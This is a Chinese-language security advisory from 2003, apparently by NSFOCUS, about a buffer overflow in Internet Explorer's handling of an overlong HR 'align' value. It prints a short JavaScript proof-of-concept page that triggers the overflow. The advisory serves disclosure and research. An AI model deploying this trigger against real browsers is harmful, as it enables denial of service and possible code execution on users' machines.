安全研究

安全漏洞
Microsoft Internet Explorer HR Align缓冲区溢出漏洞

发布日期:2003-06-26
更新日期:2003-07-02

受影响系统:
Microsoft Internet Explorer 6.0SP1
Microsoft Internet Explorer 5.5SP2
Microsoft Internet Explorer 5.5SP1
Microsoft Internet Explorer 5.5
Microsoft Internet Explorer 5.01
Microsoft Internet Explorer 5.0.1SP3
Microsoft Internet Explorer 5.0.1SP2
Microsoft Internet Explorer 5.0.1SP1
Microsoft Internet Explorer 5.0
Microsoft Internet Explorer 6.0
    - Microsoft Windows XP
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows 2003 Web Edition
    - Microsoft Windows 2003 Standard Edition
    - Microsoft Windows 2003 Enterprise Edition 64-bit
    - Microsoft Windows 2003 Enterprise Edition
    - Microsoft Windows 2003 Datacenter Edition 64-bit
    - Microsoft Windows 2003 Datacenter Edition
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
    - Microsoft Windows 2000 Server
    - Microsoft Windows 2000 Professional SP2
    - Microsoft Windows 2000 Professional SP1
    - Microsoft Windows 2000 Professional
    - Microsoft Windows 2000 Datacenter Server SP2
    - Microsoft Windows 2000 Datacenter Server SP1
    - Microsoft Windows 2000 Datacenter Server
    - Microsoft Windows 2000 Advanced Server SP2
    - Microsoft Windows 2000 Advanced Server SP1
    - Microsoft Windows 2000 Advanced Server
描述:
BUGTRAQ  ID: 8016

Microsoft Internet Explorer是一款流行的WEB浏览程序。

Microsoft Internet Explorer对'HR'标记的'Align'值缺少充分检查,远程攻击者可以利用这个漏洞对IE进行拒绝服务攻击,可能以用户权限在系统上执行任意指令。

问题存在于HTML32.cnv程序,是HTML转换程序,攻击者如果构建'HR'标记的'Align'值包含超长字符串的页面,由于此DLL程序没有对'Align'值进行正确的缓冲区边界检查,可导致触发缓冲区溢出,可以控制EBP、EIP等寄存器,精心提交字符串数据可能以用户权限在系统上执行任意指令。

<*来源:Digital Scream (digitalscream@real.xakep.ru
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105639925122961&w=2
        http://marc.theaimsgroup.com/?l=bugtraq&m=105664956224431&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Digital Scream (digitalscream@real.xakep.ru)提供了如下测试方法:

构建包含如下代码的WEB页:

<script>
wnd=open("about:blank","","");
wnd.moveTo(screen.Width,screen.Height);
WndDoc=wnd.document;
WndDoc.open();
WndDoc.clear();
buffer="";
for(i=1;i<=127;i++)buffer+="X";
buffer+="DigitalScream";
WndDoc.write("<HR align='"+buffer+"'>");
WndDoc.execCommand("SelectAll");
WndDoc.execCommand("Copy");
wnd.close();
</script>

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

浏览次数:3425
严重程度:11(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障